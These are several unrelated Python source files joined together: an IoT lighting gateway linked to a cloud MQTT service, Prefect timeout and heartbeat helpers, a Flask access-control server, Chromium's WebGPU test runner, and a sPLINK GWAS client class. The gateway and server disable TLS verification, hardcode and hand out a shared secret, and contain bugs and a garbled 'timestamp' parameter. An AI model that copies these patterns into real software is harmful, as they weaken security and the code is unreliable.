CLOUD_URL = 'http://192.168.83.166:8088/cloud-web-api'
# 扫描URL
url_w_get_dev_list = "/light_w/dev_list"
url_wy_get_dev_list = "/light_wy/dev_list"
url_wrgb_get_dev_list = "/light_wrgb/dev_list"
# 控制URL
url_w_set_dim_level = "/light_w/set_dim_level"
url_wy_set_dim_level = "/light_wy/set_dim_level"
url_wrgb_set_dim_level = "/light_wrgb/set_dim_level"
def get_mac_addr():
mac = uuid.UUID(int=uuid.getnode()).hex[-12:]
return ":".join([mac[e:e + 2] for e in range(0, 11, 2)]).upper()
MAC_ADDR = get_mac_addr()
# 获取当前时间戳
CURRENT_TIME_MILLIS = lambda: int(round(time.time() * 1000))
# mqtt客户端
client_id = time.strftime('%Y%m%d%H%M%S', time.localtime(time.time()))
client = mqtt.Client(client_id)
class GatewayDevice(object):
def __init__(self, addr, visibility, dtype, pan, mac, fw_ver, connect_type, detail):
self.addr = addr
self.visibility = visibility
self.type = dtype
self.pan = pan
self.mac = mac
self.fw_ver = fw_ver
self.connect_type = connect_type
self.detail = detail
def convert_to_dict(self):
return self.__dict__
def json2GatewayDevice(json_str):
return GatewayDevice(json_str['addr'], json_str['visibility'], json_str['type'], json_str['pan'],
json_str['mac'], json_str['fw_ver'], json_str['connect_type'], None)
class CloudDevice(object):
def __init__(self):
self.deviceCode = ''
self.deviceMac = ''
self.state = ''
self.deviceName = ''
self.productKey = ''
self.productName = ''
self.deviceOriginalType = ''
self.categoryName = ''
self.brandName = ''
self.parent = 0
self.detail = ''
self.switchStatus = ''
self.detailState = ''
def convert_to_dict(self):
return self.__dict__
def log(msg):
print(str(datetime.now())+': '+msg)
def get_message_id():
return int(1e5 * random.random())
def get_gateway_info():
reqUrl = GATEWAY_URL + '/info'
resp = requests.post(reqUrl, verify=False)
data = json.loads(resp.text)
if (data['success'] == 'true'):
return data['object']
return None
def hmac_md5(ekey, to_enc):
return hmac.new(str.encode(ekey), str.encode(to_enc), hashlib.md5).hexdigest().upper()
def get_topic(product_key, device_no):
return '/' + str(product_key) + '/' + str(device_no)
def get_pub_api(product_key, device_no):
return '/topic/' + str(product_key) + '/' + str(device_no) + '/pub' + '?level=1'
def get_device_list():
req_url = GATEWAY_URL + '/get_dev_list'
resp = requests.post(req_url, verify=False)
data = json.loads(resp.text)
if data['success'] == 'true':
return data['objects']
def get_device_detail(device_dict, url):
req_url = GATEWAY_URL + url
resp = requests.post(req_url, verify=False)
data = json.loads(resp.text)
if (data['success'] == 'true'):
result = data['objects']
for json_str in result:
try:
device = json.loads(json.dumps(json_str))
if 'w' in device:
device['level'] = device['w']
device['levelW'] = device['w']
device_dict[json_str['mac']].detail = json.dumps(device)
except:
log('json type error')
# 搜索网关下所有设备
def get_all_device():
device_dict = dict()
device_list = get_device_list()
if device_list:
for json_str in device_list:
try:
device = json.loads(json.dumps(json_str), object_hook=json2GatewayDevice)
device_dict[json_str['mac']] = device
except AttributeError:
log('json attribute error')
except TypeError:
log('json type error')
# 映射转换
get_device_detail(device_dict, url_wy_get_dev_list)
get_device_detail(device_dict, url_wrgb_get_dev_list)
get_device_detail(device_dict, url_w_get_dev_list)
# 去除unknow设备
for key in device_dict.keys():
if device_dict[key].detail is None:
del device_dict[key]
return device_dict
def get_cloud_device_list(device_dict):
device_list = list()
for baseDevice in device_dict.items():
device = CloudDevice()
device.deviceName = baseDevice.mac
device.deviceOriginalType = baseDevice.type
device.deviceMac = baseDevice.addr
device.brandName = 'homw'
device.switchStatus = 'on'
device.state = 'online'
detail = dict()
detail['addr'] = baseDevice.addr
detail['connect_type'] = 'HOMwNet'
detail['detail'] = baseDevice.detail
device.detail = detail
device_list.append(device.convert_to_dict())
return device_list
# 上报网关下子设备
def upload_device_list(token):
log('开始上传数据到云平台.....')
# 网关设备
device_dict = get_all_device()
# 转换为平台设备
device_list = get_cloud_device_list(device_dict)
up_data = dict()
up_data['messageId'] = get_message_id()
up_data['msgType'] = 'notify'
up_data['services'] = json.dumps(device_list)
header = {
'Content-Type': 'application/json',
'password': token
}
req_url = CLOUD_URL + get_pub_api(PRODUCT_KEY, DEVICE_NO)
requests.post(req_url, headers=header, json=up_data, verify=False)
def cloud_auth():
# gateway = get_gateway_info()
to_enc = 'clientId' + MAC_ADDR + 'deviceName' + DEVICE_NO + 'productKey' + PRODUCT_KEY + 'timestamp' + \
str(CURRENT_TIME_MILLIS())
# 签名
sign = hmac_md5(SECRET_KEY, to_enc)
# 请求参数
params = 'productKey=' + PRODUCT_KEY + '&sign=' + sign + '&signmethod=' + 'hmacmd5' + '×tamp=' + str(CURRENT_TIME_MILLIS()) \
+'&version=default&clientId=' + MAC_ADDR + '&resources=mqtt&deviceName=' + DEVICE_NO
reqUrl = CLOUD_URL + '/auth?' + params
# 请求头
headers = {
'Content-Type': 'application/x-www-form-urlencoded'
}
resp = requests.post(reqUrl, headers=headers, verify=False)
return json.loads(resp.text)
# mqtt连接回调
def on_connect(client, user_data, flags, code):
log("mqtt连接信息状态码:" + str(code))
topic = get_topic(PRODUCT_KEY, DEVICE_NO)
client.subscribe(topic, qos=1)
# mqtt消息到达回调
def on_message(client, user_data, msg):
try:
recv_msg = str(msg.payload.decode("utf-8-sig"))
json_msg = json.loads(recv_msg)
msg_type = json_msg['msgType']
if msg_type == 'set':
set_command(json.loads(json_msg['services']))
except ValueError:
log('recv msg error')
def start_gateway_loop(auth_info):
mqtt_dict = auth_info['result']['resources']['mqtt']
user_name = mqtt_dict['userName']
pass_word = mqtt_dict['password']
host = mqtt_dict['host']
port = mqtt_dict['port']
# 绑定回调
client.on_connect = on_connect
client.on_message = on_message
client.username_pw_set(user_name, pass_word)
# 建立连接
back = client.connect(host, port, 60)
log('mqtt客户端连接返回(0表示连接成功):' + str(back))
client.loop_forever()
def set_command(msg):
command = json.loads(msg['command'])
dtype = msg['orgType']
addr = msg['seqNo']
if dtype == 'light_w':
dimUrl = GATEWAY_URL + url_w_set_dim_level + '?' + 'dev=' + addr + '&' + 'level=' + str(command[0]['ptValue'])
log(dimUrl)
resp = requests.post(dimUrl, verify=False)
# 此处可添加睡眠1秒 再次请求网关,将设备状态传给平台
log(resp.text)
if dtype == 'light_wy':
dimUrl = GATEWAY_URL + url_wy_set_dim_level + '?' + 'dev=' + addr + '&' + 'levelW=' + str(command[0]['ptValue']) \
+ '&' + 'levelY=' + str(command[1]['ptValue'])
log(dimUrl)
resp = requests.post(dimUrl, verify=False)
log(resp.text)
if dtype == 'light_wrgb':
pass
def get_cloud_auth():
auth_info = cloud_auth()
log(auth_info)
if (auth_info['code'] != '200'):
time.sleep(5)
log('连接平台认证识别,进行重试....!')
return get_cloud_auth()
else:
return auth_info
def upload_task():
while True:
upload_device_list(CLOUD_PASSWORD)
time.sleep(300)
if __name__ == '__main__':
# 云平台认证
auth_info = get_cloud_auth()
if (auth_info['code'] == '200'):
log("认证成功")
mqtt_dict = auth_info['result']['resources']['mqtt']
CLOUD_PASSWORD = mqtt_dict['password']
# 定时上报
upload_thread = Thread(target=upload_task)
upload_thread.start()
# 监听指令
start_gateway_loop(auth_info)
upload_thread.join()
|
executors.py | import multiprocessing
import os
import signal
import subprocess
import sys
import threading
import warnings
from concurrent.futures import ThreadPoolExecutor
from concurrent.futures import TimeoutError as FutureTimeout
from functools import wraps
from typing import TYPE_CHECKING, Any, Callable, List, Union
import prefect
if TYPE_CHECKING:
import prefect.engine.runner
import prefect.engine.state
from prefect.engine.state import State # pylint: disable=W0611
StateList = Union["State", List["State"]]
def run_with_heartbeat(
runner_method: Callable[..., "prefect.engine.state.State"]
) -> Callable[..., "prefect.engine.state.State"]:
"""
Utility decorator for running class methods with a heartbeat. The class should implement
`self._heartbeat` with no arguments.
"""
@wraps(runner_method)
def inner(
self: "prefect.engine.runner.Runner", *args: Any, **kwargs: Any
) -> "prefect.engine.state.State":
try:
p = None
try:
if self._heartbeat():
# we use Popen + a prefect CLI for a few reasons:
# - using threads would interfere with the task; for example, a task
# which does not release the GIL would prevent the heartbeat thread from
# firing
# - using multiprocessing.Process would release the GIL but a subprocess
# cannot be spawned from a deamonic subprocess, and Dask sometimes will
# submit tasks to run within daemonic subprocesses
current_env = dict(os.environ).copy()
auth_token = prefect.context.config.cloud.get("auth_token")
api_url = prefect.context.config.cloud.get("api")
current_env.setdefault("PREFECT__CLOUD__AUTH_TOKEN", auth_token)
current_env.setdefault("PREFECT__CLOUD__API", api_url)
p = subprocess.Popen(
self.heartbeat_cmd,
env=current_env,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
except Exception as exc:
self.logger.exception(
"Heartbeat failed to start. This could result in a zombie run."
)
return runner_method(self, *args, **kwargs)
finally:
if p is not None:
exit_code = p.poll()
if exit_code is not None:
out, err = p.communicate()
msg = "Heartbeat process died with exit code {}".format(exit_code)
msg += "\nSTDOUT: {}".format(out.decode() if out else None)
msg += "\nSTDERR: {}".format(err.decode() if err else None)
self.logger.error(msg)
p.kill()
return inner
def main_thread_timeout(
fn: Callable, *args: Any, timeout: int = None, **kwargs: Any
) -> Any:
"""
Helper function for implementing timeouts on function executions.
Implemented by setting a `signal` alarm on a timer. Must be run in the main thread.
Args:
- fn (callable): the function to execute
- *args (Any): arguments to pass to the function
- timeout (int): the length of time to allow for
execution before raising a `TimeoutError`, represented as an integer in seconds
- **kwargs (Any): keyword arguments to pass to the function
Returns:
- the result of `f(*args, **kwargs)`
Raises:
- TimeoutError: if function execution exceeds the allowed timeout
- ValueError: if run from outside the main thread
"""
if timeout is None:
return fn(*args, **kwargs)
def error_handler(signum, frame): # type: ignore
raise TimeoutError("Execution timed out.")
try:
signal.signal(signal.SIGALRM, error_handler)
signal.alarm(timeout)
return fn(*args, **kwargs)
finally:
signal.alarm(0)
def multiprocessing_timeout(
fn: Callable, *args: Any, timeout: int = None, **kwargs: Any
) -> Any:
"""
Helper function for implementing timeouts on function executions.
Implemented by spawning a new multiprocess.Process() and joining with timeout.
Args:
- fn (callable): the function to execute
- *args (Any): arguments to pass to the function
- timeout (int): the length of time to allow for
execution before raising a `TimeoutError`, represented as an integer in seconds
- **kwargs (Any): keyword arguments to pass to the function
Returns:
- the result of `f(*args, **kwargs)`
Raises:
- AssertionError: if run from a daemonic process
- TimeoutError: if function execution exceeds the allowed timeout
"""
if timeout is None:
return fn(*args, **kwargs)
def retrieve_value(
*args: Any, _container: multiprocessing.Queue, _ctx_dict: dict, **kwargs: Any
) -> None:
"""Puts the return value in a multiprocessing-safe container"""
try:
with prefect.context(_ctx_dict):
val = fn(*args, **kwargs)
_container.put(val)
except Exception as exc:
_container.put(exc)
q = multiprocessing.Queue() # type: multiprocessing.Queue
kwargs["_container"] = q
kwargs["_ctx_dict"] = prefect.context.to_dict()
p = multiprocessing.Process(target=retrieve_value, args=args, kwargs=kwargs)
p.start()
p.join(timeout)
p.terminate()
if not q.empty():
res = q.get()
if isinstance(res, Exception):
raise res
return res
else:
raise TimeoutError("Execution timed out.")
def timeout_handler(
fn: Callable, *args: Any, timeout: int = None, **kwargs: Any
) -> Any:
"""
Helper function for implementing timeouts on function executions.
The exact implementation varies depending on whether this function is being run
in the main thread or a non-daemonic subprocess. If this is run from a daemonic subprocess or on Windows,
the task is run in a `ThreadPoolExecutor` and only a soft timeout is enforced, meaning
a `TimeoutError` is raised at the appropriate time but the task continues running in the background.
Args:
- fn (callable): the function to execute
- *args (Any): arguments to pass to the function
- timeout (int): the length of time to allow for
execution before raising a `TimeoutError`, represented as an integer in seconds
- **kwargs (Any): keyword arguments to pass to the function
Returns:
- the result of `f(*args, **kwargs)`
Raises:
- TimeoutError: if function execution exceeds the allowed timeout
"""
# if no timeout, just run the function
if timeout is None:
return fn(*args, **kwargs)
# if we are running the main thread, use a signal to stop execution at the appropriate time;
# else if we are running in a non-daemonic process, spawn a subprocess to kill at the appropriate time
if not sys.platform.startswith("win"):
if threading.current_thread() is threading.main_thread():
return main_thread_timeout(fn, *args, timeout=timeout, **kwargs)
elif multiprocessing.current_process().daemon is False:
return multiprocessing_timeout(fn, *args, timeout=timeout, **kwargs)
msg = (
"This task is running in a daemonic subprocess; "
"consequently Prefect can only enforce a soft timeout limit, i.e., "
"if your Task reaches its timeout limit it will enter a TimedOut state "
"but continue running in the background."
)
else:
msg = (
"This task is running on Windows; "
"consequently Prefect can only enforce a soft timeout limit, i.e., "
"if your Task reaches its timeout limit it will enter a TimedOut state "
"but continue running in the background."
)
warnings.warn(msg)
executor = ThreadPoolExecutor()
def run_with_ctx(*args: Any, _ctx_dict: dict, **kwargs: Any) -> Any:
with prefect.context(_ctx_dict):
return fn(*args, **kwargs)
fut = executor.submit(
run_with_ctx, *args, _ctx_dict=prefect.context.to_dict(), **kwargs
)
try:
return fut.result(timeout=timeout)
except FutureTimeout:
raise TimeoutError("Execution timed out.")
class RecursiveCall(Exception):
def __init__(self, func: Callable, *args: Any, **kwargs: Any):
self.func = func
self.args = args
self.kwargs = kwargs
def tail_recursive(func: Callable) -> Callable:
"""
Helper function to facilitate tail recursion of the wrapped function.
This allows for recursion with unlimited depth since a stack is not allocated for
each "nested" call. Note: instead of calling the target function in question, a
`RecursiveCall` exception must be raised instead.
Args:
- fn (callable): the function to execute
Returns:
- the result of `f(*args, **kwargs)`
Raises:
- RecursionError: if a recursive "call" (raised exception) is made with a function that is
not decorated with `tail_recursive` decorator.
"""
@wraps(func)
def wrapper(*args: Any, **kwargs: Any) -> Any:
while True:
try:
return func(*args, **kwargs)
except RecursiveCall as exc:
try:
call_func = getattr(exc.func, "__wrapped_func__")
except AttributeError:
raise RecursionError(
"function has not been wrapped to provide tail recursion (func={})".format(
exc.func
)
)
# there may be multiple nested recursive calls, we should only respond to calls for the
# wrapped function explicitly, otherwise allow the call to continue to propagate
if call_func != func:
raise exc
args = exc.args
kwargs = exc.kwargs
continue
setattr(wrapper, "__wrapped_func__", func)
return wrapper
|
server.py | #!/usr/bin/env python3
"""
This script launch the server, used as a master to handle
clients configuration and validate credentials.
It can be run on any platform with python and pip requierments installed
"""
__version__ = '0.1'
""" """
from configparser import ConfigParser
import json
import time
from threading import Thread
""" Flask imports """
from flask import Flask, request, send_from_directory, render_template, jsonify, request, Blueprint
from web.router import query_js, query_styles, view_index, edp_is_alive, edp_confirm_adopt, view_access_management
""" Business import """
from lib.datasource import DataSource
from lib.visibilityManager import VisibilityManager
from lib.common import ServerSetting, DeviceConfiguration, Member, DeviceStatus, PrintColor
""" When called by external WSGI server """
if __name__ == "__main__":
CONNECTION_FILE_PATH = "./cfg/connectionString.sql" #Default
else:
CONNECTION_FILE_PATH = "/app/omni/cfg/connectionString.sql" #Default
SERVER_SECRET = "DaSecretVectorUsedToHashCommunication" #Default
connected_devices = []
app = Flask(__name__, static_url_path='')
start_time = time.time()
""" Loading static routing blueprints (static pages, ressources queries) """
app.register_blueprint(query_js)
app.register_blueprint(query_styles)
app.register_blueprint(view_index)
app.register_blueprint(edp_confirm_adopt)
app.register_blueprint(edp_is_alive)
app.register_blueprint(view_access_management)
""" Flask routing definition """
""" TODO : Put everything in the "router.py" file """
#View state
@app.route("/stateView")
def view_state():
return render_template('./server/system/stateView.html', devices=connected_devices, uptime=get_uptime())
#View enroll
@app.route("/enrollView")
def view_enroll():
""" Check devices and load settings """
source = DataSource(DataSource.TYPE_DATABASE, CONNECTION_FILE_PATH)
settingAccess = ServerSetting('enroll')
settingAccess.parameters = source.get_not_enrolled_members()
settingAccess.groups = source.get_members_groups()
settings = []
settings.append(settingAccess)
return render_template('./server/accessManagement/enrollView.html', settings=settings)
#View group
@app.route("/groupView")
def view_groups():
return render_template('./server/accessManagement/groupView.html')
#View settings
@app.route("/settingsView")
def view_settings():
""" Check devices and load settings """
source = DataSource(DataSource.TYPE_DATABASE, CONNECTION_FILE_PATH)
""" TODO : Return settings according to devices types """
settingAccess = ServerSetting('enroll')
settings = []
settings.append(settingAccess)
return render_template('./server/common/settingsView.html', settings=settings)
@app.route("/enroll", methods=['POST'])
def enroll():
member = Member(request.form['Id'])
member.lastname = request.form['lastname']
member.firstname = request.form['firstname']
member.groupId = request.form['groupId']
source = DataSource(DataSource.TYPE_DATABASE, CONNECTION_FILE_PATH)
source.update_member_info(member)
return json.dumps({'success':True}), 200, {'ContentType':'application/json'}
@app.route("/report/state", methods=['POST'])
def report_state():
data = request.data
device_status_data = json.loads(data)
for x in connected_devices:
if x.client_id == device_status_data['client_id']:
x.is_in_error = device_status_data['is_in_error']
x.error_status = device_status_data['error_status']
break
return json.dumps({'success':True}), 200, {'ContentType':'application/json'}
@app.route("/accessRule/<zone>/token/<credential>", methods=['GET'])
def validate_credential(zone, credential):
"""
Token is already calculated
"""
source = DataSource(DataSource.TYPE_DATABASE, CONNECTION_FILE_PATH)
canAccess = source.get_or_create_client_access_rights(credential, zone)
if canAccess:
return json.dumps({'success':True}), 200, {'ContentType':'application/json'}
else:
return json.dumps({'success':False}), 403, {'ContentType':'application/json'}
@app.route("/accessRule/<zone>/<token_type>/token_data", methods=['POST'])
def report_state_zone(zone, token_type):
data = request.data
data = json.loads(data)
if token_type == 'characteristics':
print(str(data))
else:
return json.dumps({'success':False}), 404, {'ContentType':'application/json'}
return json.dumps({'success':True}), 200, {'ContentType':'application/json'}
@app.route("/configuration/<client_id>")
def configuration(client_id):
configuration = get_configuration_by_client_id(client_id)
configuration.secret = SERVER_SECRET
""" Update client endpoint """
for x in connected_devices:
if x.client_id == client_id:
x.endpoint = str(request.remote_addr)
break
if configuration is None:
return json.dumps({'success':False}), 204, {'ContentType':'application/json'}
print(PrintColor.OKBLUE + "Sending configuration for client " + str(client_id))
return jsonify(configuration.serialize()), 200, {'ContentType':'application/json'}
def get_configuration_by_client_id(client_id):
source = DataSource(DataSource.TYPE_DATABASE, CONNECTION_FILE_PATH)
conf = source.load_device_configuration(client_id)
""" Update list """
for x in connected_devices:
if x.client_id == client_id:
connected_devices.remove(x)
break
connected_devices.append(conf)
return conf
def get_uptime():
from datetime import timedelta
uptime_string = str(timedelta(seconds = time.time() - start_time))
return uptime_string
def load_server_configuration():
source = DataSource(DataSource.TYPE_DATABASE, CONNECTION_FILE_PATH)
conf = source.load_server_configuration()
def pre_start_diagnose():
print(PrintColor.OKBLUE + "Pre-start diagnostic ...")
print(PrintColor.OKBLUE + "1) Loading application configuration ...")
""" Reading configuration """
appConfig = ConfigParser()
appConfig.read('./cfg/config.ini')
print(PrintColor.OKBLUE + "Sections found : " + str(appConfig.sections()))
if len(appConfig.sections()) == 0:
raise RuntimeError(PrintColor.WARNING + "Could not open configuration file")
CONNECTION_FILE_PATH = appConfig.get("AppConstants", "ConnectionStringFilePath")
SERVER_SECRET = appConfig.get("AppConstants", "Secret")
print(PrintColor.OKBLUE + " >> Configuration OK")
print(PrintColor.OKBLUE + "2) Trying to reach datasource...")
sourceDbConnection = DataSource(DataSource.TYPE_DATABASE, CONNECTION_FILE_PATH)
dataSourceOk = sourceDbConnection.is_reachable()
if dataSourceOk == 1:
print(PrintColor.OKBLUE + " >> Datasource OK")
else:
print(PrintColor.WARNING + " >> Datasource unreachable.")
#Only if it's run
if __name__ == "__main__":
pre_start_diagnose()
""" Start discovery manager """
visibility_manager = VisibilityManager()
discovery_thread = Thread(target=visibility_manager.listen_for_discovery_datagram)
discovery_thread.start()
print(PrintColor.OKGREEN + "Start web server...")
app.run(host='0.0.0.0', port=5000)
print(PrintColor.OKGREEN + "Web server stopped.")
visibility_manager.must_stop = True
print(PrintColor.OKBLUE + "Waiting for secondaries threads")
discovery_thread.join()
|
run_webgpu_cts.py | # Copyright 2021 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import argparse
import json
from six.moves import BaseHTTPServer
from six.moves import urllib
import sys
from tempfile import mkstemp
import threading
import os
import logging
# This script is run via //third_party/blink/tools/run_webgpu_cts.py which
# adds blinkpy to the Python path.
from blinkpy.common import path_finder
from blinkpy.common.host import Host
from blinkpy.web_tests import run_web_tests
path_finder.add_typ_dir_to_sys_path()
from typ.expectations_parser import TaggedTestListParser, Expectation
from typ.json_results import ResultType
# Basic HTTP request handler to serve the WebGPU webgpuCtsExpectations.js file
class RequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def __init__(self, *args, **kwargs):
BaseHTTPServer.BaseHTTPRequestHandler.__init__(self, *args, **kwargs)
def do_GET(self):
if self.path == "/webgpuCtsExpectations.js":
self.send_response(200)
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('Content-Type', 'application/javascript')
self.end_headers()
self.wfile.write(self.server.expectations_js)
elif self.path == '/_start' or self.path == '/_stop':
self.send_response(200)
self.end_headers()
else:
self.send_response(404)
self.end_headers()
self.wfile.write('Not found')
# Basic HTTP server which handles request using RequestHandler on a background thread.
class ExpectationsServer(BaseHTTPServer.HTTPServer):
def __init__(self, expectations_js, server_address):
BaseHTTPServer.HTTPServer.__init__(self, server_address,
RequestHandler)
self._should_run = False
self._thread = None
self.expectations_js = expectations_js
def start(self):
assert not self._thread
self._should_run = True
def _loop():
while self._should_run:
self.handle_request()
self._thread = threading.Thread(name='webgpu_expectations_server',
target=_loop)
# Mark the thread as a daemon to be sure it exits. We still have an explicit
# |stop| method because daemon threads are stopped abruptly at shutdown without
# cleaning up resources.
self._thread.daemon = True
self._thread.start()
# Ensure the server is running.
# We want to wait synchronously for this so that server startup time doesn't
# cut into test run time.
while True:
try:
urllib.request.urlopen(
'http://%s:%d/_start' %
(self.server_address[0], self.server_address[1])).read()
except IOError as e:
logging.warning(e)
continue
return
def stop(self):
self._should_run = False
try:
# Load a url so |handle_request| returns.
urllib.request.urlopen(
'http://%s:%d/_stop' %
(self.server_address[0], self.server_address[1])).read()
except IOError as e:
logging.warning(e)
self._thread.join()
self._thread = None
def split_cts_expectations_and_web_test_expectations(
expectations_file_contents, platform_tags=None):
"""Split web test expectations (bit.ly/chromium-test-list-format) into a Javascript
module containing expectations for the WebGPU CTS, and a filtered list of the same web
test expectations, excluding the bits handled by the WebGPU CTS. Returns an object:
{
cts_expectations_js: "export const expectations = [ ... ]",
web_test_expectations: {
expectations: <expectations contents>
tag_set: <frozenset of tags used by the expectations>
result_set: <frozenset of result tags used by the expectations>
}
}"""
cts_expectations = []
out_tag_set = set()
out_result_set = set()
out_expectations = []
parser = TaggedTestListParser(expectations_file_contents)
# For each expectation, append it to |cts_expectations| if the CTS can understand it.
# Expectations not supported by the CTS will be forwarded to the web tests harness.
# This allows us to preserve expectations like [ Slow Crash Timeout RetryOnFailure ].
# It also preserves expectations like [ Pass ] which are used for test splitting.
# TODO(crbug.com/1186320): Handle test splits / variant generation separately?
# Web test expectations that are passed through are run as separate variants.
# Since [ Slow Crash Timeout RetryOnFailure Pass ] are Web test expectations,
# they have the downside that they must be a prefix of the test name. If they don't match
# anything the variant generator will warn.
# TODO(crbug.com/1186320): Also validate the CTS expectation query.
# TODO(crbug.com/1186320): We may be able to use skip expectations in the
# CTS for Crash/Timeout, and then have a separate test suite which runs only the problematic
# tests. We would generate variants specifically for each expectation to avoid the
# prefix problem. This would allow us to have exact test suppressions at the cost of
# potentially running some tests multiple times if there are overlapping expectations.
for exp in parser.expectations:
# Skip expectations that are not relevant to this platform
if platform_tags is not None and not exp.tags.issubset(platform_tags):
continue
results = exp.results
raw_results = exp.raw_results
# Do not do special handling of expectations that aren't for the CTS.
# ex.) ref tests run in WPT without the CTS.
# TODO(crbug.com/1186320): This could be a more robust check.
if 'q=webgpu:' in exp.test:
# Pass Skip expectations to the CTS.
if ResultType.Skip in results:
assert len(
results
) == 1, 'Skip expectations must not be combined with other expectations'
cts_expectations.append({
'query': exp.test,
'expectation': 'skip'
})
continue
# Consume the [ Failure ] expectation for the CTS, but forward along other expectations.
# [ Pass, Crash, Timeout ] will impact variant generation.
# TODO(crbug.com/1186320): Teach the CTS RetryOnFailure.
if ResultType.Failure in results and not exp.should_retry_on_failure:
cts_expectations.append({
'query': exp.test,
'expectation': 'fail'
})
results = results.difference(set((ResultType.Failure, )))
raw_results = [r for r in raw_results if r != 'Failure']
if len(raw_results) != 0:
# Forward everything, with the modified results.
out_exp = Expectation(reason=exp.reason,
test=exp.test,
results=results,
lineno=exp.lineno,
retry_on_failure=exp.should_retry_on_failure,
is_slow_test=exp.is_slow_test,
conflict_resolution=exp.conflict_resolution,
raw_tags=exp.raw_tags,
raw_results=raw_results,
is_glob=exp.is_glob,
trailing_comments=exp.trailing_comments)
out_expectations.append(out_exp)
# Add the results and tags the expectation uses to sets.
# We will prepend these to the top of the out file.
out_result_set = out_result_set.union(out_exp.raw_results)
out_tag_set = out_tag_set.union(out_exp.raw_tags)
return {
'cts_expectations_js':
'export const expectations = ' + json.dumps(cts_expectations),
'web_test_expectations': {
'expectations': out_expectations,
'tag_set': out_tag_set,
'result_set': out_result_set
}
}
def main(args, stderr):
parser = argparse.ArgumentParser(
description=
'Start the WebGPU expectations server, then forwards to run_web_tests.py'
)
parser.add_argument('--webgpu-cts-expectations', required=True)
options, rest_args = parser.parse_known_args(args)
web_test_expectations_fd, web_test_expectations_file = mkstemp()
forwarded_args = rest_args + [
'--ignore-default-expectations', '--additional-expectations',
web_test_expectations_file
]
run_web_tests_options = run_web_tests.parse_args(forwarded_args)[0]
# Construct a web tests port using the test arguments forwarded to run_web_tests.py
# (ex. --platform=android) in order to discover the tags that the web tests harness will
# use. This includes the OS, OS version, architecture, etc.
platform_tags = Host().port_factory.get(
run_web_tests_options.platform,
run_web_tests_options).get_platform_tags()
with open(options.webgpu_cts_expectations) as f:
split_result = split_cts_expectations_and_web_test_expectations(
f.read(), platform_tags)
# Write the out expectation file for web tests.
with open(web_test_expectations_file, 'w') as expectations_out:
web_test_exp = split_result['web_test_expectations']
expectations_out.write('# tags: [ ' +
' '.join(web_test_exp['tag_set']) + ' ]\n')
expectations_out.write('# results: [ Slow ' +
' '.join(web_test_exp['result_set']) + ' ]\n\n')
for exp in web_test_exp['expectations']:
expectations_out.write(exp.to_string() + '\n')
server = ExpectationsServer(split_result['cts_expectations_js'],
('127.0.0.1', 3000))
logging.info('Starting expectations server...')
server.start()
try:
run_web_tests.main(forwarded_args, stderr)
finally:
logging.info('Stopping expectations server...')
server.stop()
os.close(web_test_expectations_fd)
if __name__ == '__main__':
sys.exit(main(sys.argv[1:], sys.stderr))
|
splink_client_project.py | """
Client-side sPLINK project to compute local parameters
Copyright 2021 Reza NasiriGerdeh and Reihaneh TorkzadehMahani. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from hyfed_client.project.hyfed_client_project import HyFedClientProject
from hyfed_client.util.hyfed_steps import HyFedProjectStep
from hyfed_client.util.operation import ClientOperation
from hyfed_client.util.data_type import DataType
from splink_client.util.splink_steps import SplinkProjectStep
from splink_client.util.splink_algorithms import SplinkAlgorithm
from splink_client.util.splink_parameters import SplinkGlobalParameter, SplinkLocalParameter, SplinkProjectParameter
from splink_client.util.gwas_dataset import GwasDataset, PhenotypeValue, SnpValue, MissingValue
import numpy as np
import threading
import multiprocessing
class SplinkClientProject(HyFedClientProject):
"""
A class that provides computation functions to compute local parameters for chi-square, linear/logistic regression
"""
def __init__(self, username, token, project_id, server_url, compensator_url,
algorithm, name, description, coordinator, result_dir, log_dir,
dataset_file_path, phenotype_file_path, covariate_file_path, # Splink specific arguments
phenotype_name, covariate_names, chunk_size, max_iterations, cpu_cores): # Splink specific arguments
super().__init__(username=username, token=token, project_id=project_id, server_url=server_url, compensator_url=compensator_url,
algorithm=algorithm, name=name, description=description, coordinator=coordinator,
result_dir=result_dir, log_dir=log_dir, tool='sPLINK')
# Splink project (hyper-)parameters
self.chunk_size = chunk_size * 1000
self.max_iterations = max_iterations
# dataset (fam/bim/bed), phenotype, and covariate file paths
self.dataset_file_path = dataset_file_path
self.phenotype_file_path = phenotype_file_path
self.phenotype_name = phenotype_name
self.covariate_file_path = covariate_file_path
self.covariate_names = tuple(
[cov_name.strip() for cov_name in covariate_names.split(',')]) if covariate_names else ()
self.cpu_cores = cpu_cores
# ### attributes to compute local parameters; re-initialized in init_step function
# fam file related attributes
self.sex_values = np.array([])
self.phenotype_values = np.array([])
self.sample_count = 0
# bim file related attributes
self.snp_id_values = np.array([]) # chromosome_number, snp_name, and base_pair_position combined
self.first_allele_names = dict() # indexed by the SNP ID
self.second_allele_names = dict() # indexed by the SNP ID
# bed file related attributes
self.snp_values = dict() # indexed by the SNP ID; in sample_count_step, it is converted to a list
# covariate file related attribute
self.covariate_values = dict()
# attributes to speed-up the creation of the feature matrix
self.non_missing_index_values = np.array([])
self.covariate_matrix = np.array([])
# chunk attributes;
self.current_chunk = -1 # re-initialized in the non_missing_count_step function
self.total_chunks = -1 # re-initialized in the non_missing_count_step function
self.sub_chunk_start_indices = list() # re-initialized in the set_sub_chunk_indices function
self.sub_chunk_end_indices = list() # re-initialized in the set_sub_chunk_indices function
self.snp_indices = set() # re-initialized in each step of the project
self.current_chunk_size = 0 # it is always len(self.snp_indices)
# ### The following dictionaries are indexed by the SNP index
# attributes for non-missing-count step
self.non_missing_sample_counts = dict() # number of samples, where none of the covariate, sex, and SNP values is missing
self.allele_counts = dict() # number of first/second alleles of each SNP
# contingency table for chi-square test
self.contingency_tables = dict()
# linear regression related dictionaries
self.xt_x_matrix = dict()
self.xt_y_vector = dict()
self.sse_values = dict() # sum square error values
# logistic regression related functions
self.current_beta_iteration = -1
self.gradient_vectors = dict()
self.hessian_matrices = dict()
self.log_likelihood_values = dict()
